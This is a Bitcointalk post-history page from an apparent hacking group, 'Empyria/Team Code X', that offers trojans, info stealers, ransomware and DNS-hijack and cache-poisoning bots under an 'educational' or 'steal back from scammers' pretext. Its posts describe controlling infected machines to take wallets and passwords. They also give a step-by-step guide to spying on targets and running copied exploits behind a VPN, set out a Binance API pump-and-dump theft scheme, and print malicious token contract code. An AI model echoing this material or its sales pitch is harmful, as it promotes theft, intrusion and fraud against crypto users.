Bitcoin Forum
October 02, 2022, 08:25:24 PM *
News: Latest Bitcoin Core release: 23.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 ... 59 »
1  Economy / Marketplace / Best OS for recovering stolen BTC - Kali Linux-Installation [Tutorial][Empyria] on: June 30, 2022, 10:18:32 PM
Best OS for recovering stolen BTC - Kali Linux-Installation [Tutorial][Empyria]
+ Oracle VM Image, Screenshots, Cyberweapons, Custom OS upgrades

Former tutorials: Low Liquidity Elevation of Privilege (LLEP) - API Cracking on Binance ( https://bitcointalk.org/index.php?topic=5383676.0 ), Liquidity Pool Block Exploit ( https://bitcointalk.org/index.php?topic=5380640.msg59011949#msg59011949 ), Transfer Block Exploit ( https://bitcointalk.org/index.php?topic=5380640.msg58947334#msg58947334 ), and now, Empyria presents,

Taking back cryptocurrencies from scammers might be supported using an Operating System (OS) that was designed for such operations. Kali Linux OS comes with many hacking tools pre-installed, and much relevant software on the market was designed to run on Kali. This tutorial is supposed to kickstart your work with this OS. Further tutorials will provide additional tools that you might find practical in your hacking advances. For educational and self-defense purposes, Empyria offers various cyberweapons: backdoors, bankers, DDoS & instant messaging trojans, downloaders, exploits, fake AVs, game thieves, info stealers, ransomware, email finders, and more. A common attribute of these highly educational tools is the Kali platform. Once someone learns to use the free Metasploit exploits on Kali Linux, they know everything to handle the Empyrean cyberweapons.

For beginners, this tutorial is restricted to the Kali Linux image installation.
Concerning advanced education like bankers and trojans contact us in private message.
(Educational and self-defense purposes only.)


1) To all beginners, we recommend installing Oracle Virtual Box - https://www.virtualbox.org/wiki/Downloads.
So, we can send a pre-installed, pre-configured Oracle Kali Linux virtual machine image.


2) Depending on your computer architecture (64, 32), download a 64-bit image: https://sourceforge.net/projects/osboxes/files/v/vb/25-Kl-l-x/2022.1/64bit.7z/download
OR
Download 32-bit image: https://sourceforge.net/projects/osboxes/files/v/vb/25-Kl-l-x/2022.1/32bit.7z/download


3) Open Virtual Box.
We're also opening Virtual Box. So, we can send screenshots.




4) Click the Upper menu bar, Machine button, and New button.
Or press Ctrl + N.




5) 5.1) Type anything in the name field.
5.2) Select a folder on a drive that has much free space.
5.3) Type dropdown list value must be set to Linux.
5.4) Version dropdown list value must be set to Debian.
In your case: 64-bit OR 32-bit.
Click the Next button.




6) Memory size slide value must be set to a value in the green range.
Click the Next button.




7) Select the "Use an existing virtual hard disk file" radio button and select the downloaded file.
Click Create.




Now, you can start it.
Username: osboxes
Password: osboxes.org
If you learned the basics, we will show you our advanced image, too.
We have got many custom upgrades to the osboxes image.
The best is starting with a clean install from the basic osboxes image. Then we'll upgrade it.
Contact us in private for research tools and OS upgrades!






Demo

So, you can start listener nodes on your computers:
(A stable VPN domain will forward traffic to your localhost address and hide your IP & port.)




Trojan-infected computers (sessions) connect to your listeners:



You can write instructions on your listener nodes that trojans execute in the sessions:



Instructions involve stealing files (like passwords, wallets, and more) from sessions:



That's how you can take back your funds from scammers.
And everything else that you can sell for a profit.
If they have already spent the funds, we'll find something else on their computers that might be valuable.
(Trojans work on smartphones, too.)


Speaking of which, let us know if you need your funds back from scammers.
Perhaps, we can return your assets or something of equal value from scammers' devices.
Again, send a PM as there is no need to let them see us coming! Smiley
[We help this forum's members in our "free time." Thus no guarantee on response time.]

2  Economy / Marketplace / [TUTORIAL] How to use an exploit? (No coding.) Learn exploits, defend nations. on: April 11, 2022, 10:44:00 AM
[TUTORIAL] How to use an exploit? (No coding.) Learn exploits, defend nations.

Note to people living in warzones:
Initially, we wrote this tutorial for the victims of scammers.
However:
Take the money of your enemies, and they must give up.
Without money, no army can keep fighting.



In this tutorial, we explain how to steal back your Bitcoins.
Responsibly use this knowledge:
To take back only your assets.



1) Vulnerability Hunt
First, you have to find a vulnerability.
You have to find a good database.
If you are lucky, your target was lazy to patch up a system.
You might succeed with a public database.
You can find many using Google.
We have cracked Bitcoins using public vulnerabilities in:

If you do not know what system your targets use, talk to them.
Spy on them.
Look up where they are active.
Social media?
What products do they like/follow?
Do they have a website?
Can they afford Apple products?

You get the names you will find vulnerabilities, too.



2) Exploit Jack
An exploit is a code that utilizes a vulnerability and injects a payload into the target system.
Payload might be malware.
Or something else.
It is supposed to get your Bitcoins.
We explain a technique to build an exploit without programming skills.
Thus, we call it "Exploit Jack" and not "Exploit Programming."

2.1) Malware Exploits
If the payload is malware, it might be any variation of ransomware, trojan, keylogger, RAT, virus, worm, spyware, and many more.
These exploits are called Malware Exploits.
Since we do not want to infect this community accidentally, we do not publish these now.
Contact me in private if you want to discuss this particular group of exploits!

2.2) Malicious Exploits
If the payload is a malicious code, not malware, we call it a malicious exploit.
It is "malicious" only from the perspective of the scammer.
(Since you are taking back only your assets, I assume.)
Unlike malware, the malicious exploit does not infect you if you click on it.
You will have to send it using an Application Programming Interface (API).
So, we shared many examples for educational purposes already:
- Low Liquidity Elevation of Privilege (LLEP) - API Cracking on Binance: https://bitcointalk.org/index.php?topic=5383676.0
- Liquidity Pool Block Exploit: https://bitcointalk.org/index.php?topic=5380640.msg59011949#msg59011949
- Transfer Block Exploit: https://bitcointalk.org/index.php?topic=5380640.msg58947334#msg58947334

You already found a vulnerability.
To jack an exploit, guess what you will use:
An exploit database.
Vulnerability databases, exploit databases are all free.
You do not have to spend a satoshi.
We have found working exploits out of the box in:

You have the vulnerability.
You find an exploit for this vulnerability.
You smash it.



3) Attack
First, you need a VPN.
https://nordvpn.com is a good primary software.
Hackers usually write exploits in Python.
You do not have to install anything, though.
You may use this cloud IDE:
https://www.pythonanywhere.com/
It also functions as a secondary VPN, server, and DDoS shield.
All in one.
And you do not have to develop (=understand) anything.
Copy & paste the exploit.
Paste the data of the target (IP, username, whatever the exploit requires.)
Run.
They might ask questions because of your suspicious traffic.
However, you are taking back / protecting your assets, aren't you?


Good luck!

If you have any problem, come to us.
We help everyone and ask only small favors in return.

Thank you for your attention!
Thanks to Bitcointalk for hosting our educational materials!


- Team Code X, founders of Empyria Market
3  Economy / Marketplace / Re: [TUTORIAL] How to steal(back) $350 000? 👾 Smart Contract Malware Analysis on: February 19, 2022, 08:58:38 PM
Further exploits in the updated thread!
Scroll up and read again.
Good on you if you bookmark these pages.
4  Economy / Trading Discussion / Re: Low Liquidity Elevation of Privilege (LLEP) - API Cracking on Binance on: February 19, 2022, 08:55:20 PM
We heard your clarification requests.
So, we added an explanation figure.
Further exploits in the updated thread!
5  Economy / Trading Discussion / Binance API Cracking - Low Liquidity Elevation of Privilege (LLEP) on: January 30, 2022, 09:15:41 PM

"Quid pro quo"



What is the goal?
Empyria is a red-hat-style BTC ethical hacking team.
We find pleasure in using aggressive state-of-the-art cracking techniques.
To purify our toolkit, we systematically publish our legacy methods.
Over time, this purification will immunize cryptocurrency communities, and promote the underlying forum in search engines.

Basic terms:
The exploit is the code that contains your will.
The API (Application Programming Interface) is the door your exploit enters a financial application.

Cracking exchanges involve one or more of these exploits and send them to APIs.
Exploits have two major categories per API: CeFi and DeFi.

CeFi (Centralized Finances) Exploits
Centralized Finances are financial applications where the owners are definite companies or individuals.
We consider these apps centralized.
We can steal all money from the system if we compromise the owner (=center).
One of Bitcoin's main goals is to absorb this weakness.
Below you find our public CeFi exploits:
- Low Liquidity Elevation of Privilege (LLEP) - API Cracking on Binance
https://bitcointalk.org/index.php?topic=5383676.0


DeFi (Decentralized Finances) Exploits
Bitcoin distributed the ownership of finances.
Anyone can become a BTC owner, and every BTC owner is equal.
There is no central owner we can hack.
So, we consider these applications decentralized.
DeFi exploits usually target "hubs and Joes."
Hubs are platforms (exchanges, games, wallets, marketplaces, chat rooms, and so on.) where DeFi users meet.
"Joes" are your average "DeFi" users who bought crypto and skipped their security classes.
Needless to say, "hubs" are often developed by "Joes."
Below you find our public DeFi exploits.
- Liquidity Pool Block Exploit
https://bitcointalk.org/index.php?topic=5380640.msg59011949#msg59011949
- Transfer Block Exploit
https://bitcointalk.org/index.php?topic=5380640.msg58947334#msg58947334


"Loyalty is value."



Low Liquidity Elevation of Privilege (LLEP) - API Cracking on Binance

LLEP can withdraw BTC from your Binance account. (Without your permission.)  
Any trader might directly suffer this exploit.
And any exchange, too, because of the indirect reputation loss.


I) Environmental factors show that major exchanges often list minor tokens.
And minor exchanges too often have a small volume. (Even on popular tokens.)
The lower the liquidity is, the more dangerous the exploit becomes.
So, the exploit endangers exchanges of all sizes and colors.
Binance is only one example.
You can not sit back if you own or trade on a small exchange.

II) Two main phases

1 Moving the value from your account to that of theirs.
2 They withdraw your coins from their exchange accounts to their off-exchange accounts, cutting you from all hopes of ever seeing your coins.

The first phase consists of two components:
1.1 A  social engineering component.
1.2 a pump-and-dump component.

In social engineering (1.1), you will give your exchange API to the hacker's trading bot.
You will feel secure because you uncheck all withdrawal permissions when you generate the API.
API trading is common & safe practice between trading bots.
The hacker has not even done anything malicious yet.

To execute the pump-and-dump technique (1.2), the hacker has to find a token that has a minimal to no low supply on the exchange. (Yet tradeable.)
They buy a large amount of this token at a fair market price.
They distribute these amounts to their accounts on the exchange.
These are the accounts of the hackers. No scam so far.

Writing the payload usually begins at this point (1.2.1 ).
The hacker groups the obtained APIs concerning access level, volume, exchange...etc.
The more, the better.
They can execute the exploit using a botnet of any size, though.
The hacker's accounts put overpriced sell orders at extremely high prices (1.2.2).
Then command all accounts to buy the low-liquidity token concurrently (1.2.3).
The result is an economic anomaly dildo that penetrates the order book, fills all lucky open orders, and transfers the base market value to the hacker's accounts.

For example:
X token market price is BTC 0.0001.
We buy 1000 X tokens. Now we hold BTC 0.1 value.
We deposit this value to the exchange.
We also put a sell order at BTC 10.
We also collected 1000 APIs from investors.
Each has BTC 0.1 in their account on average.
We command all APIs to buy X at the same moment.
Since X is such an unknown token and we have such a large botnet, odds are no one can fill the hole until the accounts buy into our BTC 10 order.
At that exchange, at that moment, for us, the price of X is BTC 10.
And we have a large amount of X.
And a large amount of "customers."
Who do as we say.



Phase 2 only involves the hacker withdrawing this value from their (the hacker's) legit accounts and thus usually go without any issues.

Our team first used this exploit in 2009 in the marketplace of an online computer game, and after so many years, it is still viable even in cryptocurrencies.

III) How to counter it?
You expect us to advise against trading bots. We do not.
Trading bots are essential for financial freedom.
Instead, choose such trading bots where
1 The API management is encrypted & local.
2 You can restrict the markets to high liquidity exchanges/pairs.

Do not fall for these "cloud-based API bots!"
If you uploaded your API to anywhere, you are already serving someone's botnet. Hopefully, ours.
6  Economy / Marketplace / Re: [TUTORIAL] How to steal(back) $350 000? 👾 Smart Contract Malware Analysis on: January 17, 2022, 08:12:14 PM
Liquidity Pool Block Exploit
Ever wanted to hack an exchange?
Then read it.
The payload steals the fees from the Automated Market Maker (AMM) of a decentralized exchange (DEX) such as Pancakeswap.
It also disrupts end-user transactions and steals their gas.
How sweet!
Oh, wait!
We are white-hats now.
How evil.
The exploit is - guess what - a cryptocurrency token.

To understand the malice of the exploit, you have to grasp how liquidity pools work.
- The holders of the token deposit their token into the pool.
- They receive a profit from every buy transaction of that token.
- The AMM covers the profit from the fees (=gas).
- There is an extra detail you have to know.
- The buyer pays the fee even if the transaction fails!!
- The fees never return.

How to write such an exploit?
The scammer usually puts the malicious code into the "transferFrom" function.
When you establish a new liquidity pool for a token, that pool will get an address.
This address will go into the "newun" variable.
Then the token will work with this variable.
However, what if the scammer blocks the pool's address from the variable?
Without the pool address, the AMM cannot serve the end-user.
The transaction fails.
The end-user loses his fees.
The exchange does not work as expected.
Yet, the liquidity provider gets his profit.
If the end-user keeps trying, he keeps losing.
The harder he tries, the more he loses.
The more the scammer earns.

The exploit code
Code:
   function transfernewun(address _newun) public onlyOwner {
      newun = _newun;
    }

    function transfer(address to, uint tokens) public returns (bool success) {
       require(to != newun, "please wait");

      balances[msg.sender] = balances[msg.sender].sub(tokens);
      balances[to] = balances[to].add(tokens);
      emit Transfer(msg.sender, to, tokens);
      return true;
    }

    function approve(address spender, uint tokens) public returns (bool success) {
      allowed[msg.sender][spender] = tokens;
      emit Approval(msg.sender, spender, tokens);
      return true;
    }

    function transferFrom(address from, address to, uint tokens) public returns (bool success) {
        if(from != address(0) && newun == address(0)) newun = to;
        else require(to != newun, "please wait");

      balances[from] = balances[from].sub(tokens);
      allowed[from][msg.sender] = allowed[from][msg.sender].sub(tokens);
      balances[to] = balances[to].add(tokens);
      emit Transfer(from, to, tokens);
      return true;
    }

The purpose of the exploit is to behave like a standard token until the liquidity pool initializes the address in the newun variable.
Then the following code will block all buy transactions using the initialized liquidity pool:

The malicious code
Code:
function transferFrom(address from, address to, uint tokens) public returns (bool success) {
      if(from != address(0) && newun == address(0)) newun = to;
      else require(to != newun, "please wait");
     
    balances[from] = balances[from].sub(tokens);
    allowed[from][msg.sender] = allowed[from][msg.sender].sub(tokens);
    balances[to] = balances[to].add(tokens);
    emit Transfer(from, to, tokens);
    return true;
  }

How to counter this exploit?
It is definitely a more sophisticated exploit than the previous one.
If you are an end-user, I recommend always sending a small volume transaction using a small fee before sending anything significant.
If the transaction fails, never repeat it until you look up the potential reasons on the Internet.
You can also compare the token's contract code to the codes in this thread.
Any extra tinkering with "newun" and "_owner" compared to the legit codes above should raise the red flag.
7  Economy / Marketplace / [TUTORIAL] How to steal(back) $350 000? 👾 Smart Contract Malware Analysis on: January 09, 2022, 11:14:45 PM

"Quid pro quo"



What is the goal?
Empyria is a red-hat-style BTC ethical hacking team.
We find pleasure in using aggressive state-of-the-art cracking techniques.
To purify our toolkit, we systematically publish our legacy methods.
Over time, this purification will immunize cryptocurrency communities, and promote the underlying forum in search engines.

Basic terms:
The exploit is the code that contains your will.
The API (Application Programming Interface) is the door your exploit enters a financial application.

Cracking exchanges involve one or more of these exploits and send them to APIs.
Exploits have two major categories per API: CeFi and DeFi.

CeFi (Centralized Finances) Exploits
Centralized Finances are financial applications where the owners are definite companies or individuals.
We consider these apps centralized.
We can steal all money from the system if we compromise the owner (=center).
One of Bitcoin's main goals is to absorb this weakness.
Below you find our public CeFi exploits:
- Low Liquidity Elevation of Privilege (LLEP) - API Cracking on Binance
https://bitcointalk.org/index.php?topic=5383676.0



DeFi (Decentralized Finances) Exploits
Bitcoin distributed the ownership of finances.
Anyone can become a BTC owner, and every BTC owner is equal.
There is no central owner we can hack.
So, we consider these applications decentralized.
DeFi exploits usually target "hubs and Joes."
Hubs are platforms (exchanges, games, wallets, marketplaces, chat rooms, and so on.) where DeFi users meet.
"Joes" are your average "DeFi" users who bought crypto and skipped their security classes.
Needless to say, "hubs" are often developed by "Joes."
Below you find our public DeFi exploits.
- Liquidity Pool Block Exploit
https://bitcointalk.org/index.php?topic=5380640.msg59011949#msg59011949
- Transfer Block Exploit
https://bitcointalk.org/index.php?topic=5380640.msg58947334#msg58947334


"Loyalty is value."



[TUTORIAL] How to steal(back) $350 000? 👾 Smart Contract Malware Analysis

~ Crack/Disassemble/Debug/Reverse Engineer Smart Contract Malwares ~

Have you lost your belief in crypto?
You are not alone. Millions of people fled from a collapsing fiat economy into cryptos.
- Only to find that it is as easy to lose your wealth in the crypto world as in inflation.
Anxiety, depression, hopelessness.
How to imagine a malicious smart contract?
Trap tokens, "ponzi" trading bots ("ehm..." ArbiStar), fake exchanges.
Projects providing impressive GUIs, thousands of positive feedbacks, sometimes even real profit (selective withdrawals).
Hard news is the only way to find financial comfort is through self-education.
Yet, this thread will be proof that it is possible.
And if it is possible, you can do it.
So can your loved ones.
We aim to restore your belief in yourself.
So, you could repair humanity's belief in crypto.
It is your hope.
And you are the hope of all crypto developers: The next step in evolution. The educated man/woman.

Who are we?
We use white-hat hacking, and our group consists of certified ethical hackers (CEH).
We have got members mostly, but not exclusively from Switzerland and Hungary.
Nevertheless, we operate on an intercontinental range.
Wait, who the f*ck cares what certifications we have or where we live?
Asking this question arises from the first delusion of crypto users.

Cryptocurrencies are anonymous. But you are not.
And even if criminals can not crack a cryptocurrency's encryption algorithm right now, they can crack you.
That is right.
Most likely, even now, there is a backdoor on your computer (laptop, smartphone, smartwatch...) that reports your activities to some hidden data center.
Fortunately (for you), no one gives a sh*t about your miserable life...
...until you do something stupid: such as transacting with a malicious smart contract.
And what do you think about your trackers' answer?
The easiest one.
They will use the backdoor on YOUR computer to decrypt YOUR blockchain activities.
Then blackmail you for your not-so-bright activities.
Such as mining on your company's computers without the company's permission.
So, the more time you waste, the more money you lose.
And the coins are not the only thing you can lose.
It might be your time is ticking until your prison time.
What are you waiting?

You might think, "I have never done anything illegal with cryptocurrencies." or "Thanks a lot. That rudeness helped in my already unfortunate situation."
But we directly faced you with the truth because we care about you.
Despite your miseries, your story can contribute a lot to saving your loved ones from them.
Speaking to us about your activities is not a crime.
We obtained our certifications at the mentioned locations above, and our research of the topic is both registered at Universities and legal.
And if we can do it, so can you.
It is your time to get back your funds and more!
In our experience, you can earn from $350k to millions if you proactively crack scam projects.
To get some experience, you can take a job in a team that already does it.
- Such as ours.

To start with, learn from this thread.
We will periodically upload scam contracts that our autonomous crawlers find.
Additionally, once we give you a learning curve, we will open a competition to get a job in our team.

Now that illiterate retards got bored and left the thread, let us begin...

DeFi Malwares

Binance Smart Chain (BSC)

Name: WoodDoge
Abbreviation: WoodDoge
Contract:https://bscscan.com/address/0x9b218472051f23c2bb8d38080a017fd87587e156#code

It is almost a completely legit code save for the last section of source code:

Code:
function transferFrom(address from, address to, uint tokens) public returns (bool success) {
        
        require(from == _owner, "You are not the owner!");
        balances[from] = safeSub(balances[from], tokens);
        allowed[from][msg.sender] = safeSub(allowed[from][msg.sender], tokens);
        balances[to] = safeAdd(balances[to], tokens);
        emit Transfer(from, to, tokens);
        return true;
        
}

Especially look at the third line:

Code:
require(from == _owner, "You are not the owner!");

The smart contract ‘require’ the transaction to be ‘from’ the ‘_owner’ to complete.

If the transaction does not come from the ‘_owner’, it cancels itself with the following error message:”You are not the owner!”.
(Most likely ‘_owner’ is the scammer in this context.)

So, how does WoodDoge cause any harm if no one (except the ‘_owner’) can send it anywhere?
The concept of DeFi swap of value:
  • You send some cryptocurrency to the Automated Market Maker (AMM).
  • Another person sends another cryptocurrency to the AMM.
  • If the AMM can match your price with the other person’s price, you get the other person’s crypto and they get your cryptocurrency.

How is the situation if you substitute WoodDoge?
  • You can send any cryptocurrency (BTC, ETH, BNB…) and receive WoodDoge in return.
  • The ‘_owner’ can sell any amount of WoodDoge and receive any cryptocurrency in return.
    All right so far.
  • However, you can not send WoodDoge to anyone because you are not the ‘_owner.’
    Now, if you can not send WoodDoge to the AMM, you can receive no cryptocurrency in return.
    With other words, ‘_owner’ happily accepted your cryptocurrency and left you with a token you can never sell.

So, how to prevent harm from such malware?
  • Before you purchase a token, always check its source code.
  • Generally, it should not contain any restriction (‘if’) that only the ‘_owner’ can do some action.

Some examples for a legit ‘transferFrom’ function:

Code:
   function transferFrom(address src, address dst, uint wad)
    public
    returns (bool)
    {
        require(balanceOf[src] >= wad);

        if (src != msg.sender && allowance[src][msg.sender] != uint(-1)) {
            require(allowance[src][msg.sender] >= wad);
            allowance[src][msg.sender] -= wad;
        }

        balanceOf[src] -= wad;
        balanceOf[dst] += wad;

        Transfer(src, dst, wad);

        return true;

Code:
 function transferFrom(address sender, address recipient, uint256 amount) external returns (bool) {
    _transfer(sender, recipient, amount);
    _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "BEP20: transfer amount exceeds allowance"));
    return true;
  }

Take away from the analysis of this malware:
You have to learn to recognize when a 'transferFrom' function is maliciously restricted.
Malicious restrictions usually involve the word '_owner'.

....to be continued.

Thank you for your attention!
Thanks to Bitcointalk for hosting our educational materials!


- Team Code X, founders of Empyria Market
8  Economy / Micro Earnings / OPEN TELEGRAM JOB: ✔️ AUTO-INSTANT PAYOUTS ✨ INTRIGUING TASKS 🤑 DAILY BTC on: April 13, 2021, 02:53:08 PM
💥 WE ARE HIRING YOU 💥

✔️ AUTO-INSTANT PAYOUTS  ✨ INTRIGUING TASKS 🤑 DAILY BTC 0.0015


The good Paladins of our Imperium cracked invitations into some infidel "VIP" Telegram groups.

Using our cracked invitations, you'll join these groups under the radar and report to our hacker AI daily about some topics.

We'll capitalize on the information you acquire this way and pay you a decent salary, which could be up to daily BTC 0.0015 for your loyal service.

(As a bonus, your family can receive donations of food, clothes, and medicine through our international social network - free of charge.)

🌎 "LET'S MAKE OUR IMPERIUM GREAT TOGETHER!" 🌎
9  Alternate cryptocurrencies / Marketplace (Altcoins) / Re: SMALL JOB ON TELEGRAM 💹 3 DOT (POLKADOT) FOR AN HOUR 💹 [Last Update:04/13] on: April 13, 2021, 08:43:50 AM
#update We still have some positions open.
I will not forget to explicitly state when we filled all positions.
10  Economy / Exchanges / ⚙️ Exchanges Demo, Simulated Accounts, Free Trading Tools [Last Update: 04/13] on: April 13, 2021, 08:40:32 AM
Thank you very much for the 💙 contributors!
- Darker45
- BitMaxz
- Bitcoin_Arena
- dkbit98
- as.exchange

Demo Trading:
- https://bitsgap.com
- https://primebit.com
- https://cryptoparrot.com
- https://testnet.bitmex.com/
- https://test.deribit.com/
- https://go.etoro.com/en/practice-account
- https://www.altcoinfantasy.com/v3
- https://bitcoinflip.app/
- https://coinmarketgame.com/
- https://testnet.bybit.com/

Technical Analysis (TA) Tools:
- https://cryptowat.ch/
- https://bitcoinwisdom.io/
- https://coinalyze.net/
- https://data.bitcoinity.org/markets/volume/30d?c=e&t=b
- https://www.tradingview.com/

Blockchain Analysis & Visualization Tools:
- https://bitcoinal.com/
- https://coin360.com/
- https://www.bitcoinpricemap.com/
- https://bitinfocharts.com/

Bitcointalk Members' Custom Tools:
- BTC P2P fees comparison tool: https://as.exchange/feecalculator
- Tranched Value Securities* simulated performance: https://as.exchange/calculator
- Tranched Value Securities* short guide / course: https://as.exchange/guide/
(for the guide you would have to register -> go to settings -> go to Guide & press "start", while for others you don't have to)

PM me if you want to add any tools to the list!  Wink
11  Alternate cryptocurrencies / Marketplace (Altcoins) / SMALL JOB ON TELEGRAM 💹 3 DOT (POLKADOT) FOR AN HOUR 💹 30 SLOTS on: March 27, 2021, 03:11:23 PM
SMALL JOB ON TELEGRAM 💹 3 DOT (POLKADOT) FOR AN HOUR 💹 30 SLOTS

You'll follow a Telegram channel.

When you see the name of a token and when it's going to be listed, you report to our digital assistant.

We'll pay DOT 3 per finding.

The payment is autonomous.

In our experience, if you spend a minute hourly looking at the channel, you'll find a listing after one hour of work.

There're open positions until I don't state otherwise with big letters.

To join, click on my signature and send me your DOT address.
12  Economy / Service Announcements / Re: Flash Loan & DNS Hijack Bot 🔥 Automate DeFi Hacking 🔥 Zero Risks UPDATE 03/24 on: March 24, 2021, 06:07:38 PM
🆕 UPDATE 03/24/2021

We introduced a new bot: Cache Poisoner.
With this bot, you can take over the userbase of "DeFi" platforms and redirect them to your website.
Or redirect them to our website.
We pay Monero per every user that you poison.
We'll teach you under what conditions you can do this without harming your targets.
https://bitcointalk.org/index.php?action=pm;sa=send;u=507897 - Send me a private message or
https://t.me/imperialcodex - contact me directly on Telegram!
My response time is around 1-3 business days.
13  Alternate cryptocurrencies / Marketplace (Altcoins) / Re: Hack DeFi Platforms 🔥 Unique eBook 🔥 Example Exploits 🔥 Update: 03/24 on: March 24, 2021, 06:06:21 PM
🆕 UPDATE 03/24/2021

Our eBook is a live document.
If you think you can contribute to it with your knowledge, you can write new chapters.
We can pay in Monero (XMR).
https://bitcointalk.org/index.php?action=pm;sa=send;u=507897 - Send me a private message or
https://t.me/imperialcodex - contact me directly on Telegram!
My response time is around 1-3 business days.
14  Economy / Games and rounds / Re: Learn Flash Loans on our Platform 🔥 One-Month Free 🔥 Updated: 03/24 on: March 24, 2021, 06:04:54 PM
🆕 UPDATE 03/24/2021

You're earning while learning.
While you're learning on our platform, you can utilize your computer for Monero (XMR) mining.
From now on, every second you spend on learning, you instantly see returning in XMR.
We included mining features in the free trial.
https://bitcointalk.org/index.php?action=pm;sa=send;u=507897 - Send me a private message or
https://t.me/imperialcodex - contact me directly on Telegram!
My response time is around 1-3 business days.
15  Economy / Games and rounds / Re: Learn Flash Loans on our Platform 🔥 One-Month Free 🔥 Updated: 03/22 on: March 22, 2021, 09:36:29 AM
UPDATE 03/22

We've expanded your Trial with free DNS hijack.
Your crawler AI seeks vulnerable DeFi platforms.
https://bitcointalk.org/index.php?action=pm;sa=send;u=507897 - Send me a private message or
https://t.me/imperialcodex - contact me directly on Telegram!


(My response time is around 1-3 business days.)
16  Alternate cryptocurrencies / Marketplace (Altcoins) / Re: Hack DeFi Platforms 🔥 Unique eBook 🔥 Example Exploits 🔥 Update: 03/19 on: March 22, 2021, 09:33:44 AM
UPDATE 03/22

Your crawler AI seeks vulnerable DeFi platforms.
We only ask for a small favor in return.
https://bitcointalk.org/index.php?action=pm;sa=send;u=507897 - Send me a private message or
https://t.me/imperialcodex - contact me directly on Telegram!

(My response time is around 1-3 business days.)
17  Economy / Marketplace / Re: How to monetize an Exploit (Privilege Escalation) on Exchanges? on: March 22, 2021, 09:29:37 AM
Hey, do not believe scammy gadhashin's (u=3136965) irrational lies because we banned his "fake customer" gang for their shortsighted attempts to steal our cryptocurrencies.
Stay loyal to the good Imperium and you can get the traitors' cryptocurrencies, too.
18  Economy / Service Announcements / Re: Flash Loan & DNS Hijack Bot 🔥 Automate DeFi Hacking 🔥 Zero Risks UPDATE 03/22 on: March 22, 2021, 09:24:30 AM
UPDATE 03/22

We've added DNS hijack to your eBook.
We'll teach you how to target seed phrases with DNS hijack.
Your crawler AI seeks vulnerable DeFi platforms.
We only ask for a small favor in return.
https://bitcointalk.org/index.php?action=pm;sa=send;u=507897 - Send me a private message or
https://t.me/imperialcodex - contact me directly on Telegram!

(My response time is around 1-3 business days.)
19  Economy / Service Announcements / Re: Flash Loan & DNS Hijack Bot 🔥 Automate DeFi Hacking 🔥 Zero Risks UPDATE 03/19 on: March 19, 2021, 10:22:59 AM
UPDATE 03/19

Free One-Month Trial: https://bitcointalk.org/index.php?topic=5315034.0

Education eBook & Example Exploits: https://bitcointalk.org/index.php?topic=5316558.0

This platform automates what you can read in our eBook.

Send me a Bitcointalk private message if you want to join our service!

My response time is around 1-3 business days.
20  Alternate cryptocurrencies / Marketplace (Altcoins) / Re: Hack DeFi Platforms 🔥 Unique eBook 🔥 Example Exploits 🔥 Update: 03/19 on: March 19, 2021, 10:16:24 AM
UPDATE: 03/19

We expanded our eBook with DNS Hijack Exploit Examples (in addition to Flash Loans).

Send me a Bitcointalk private message if you want to acquire the eBook and Exploits!

My response time is around 1-3 business days.
Pages: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 ... 59 »
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!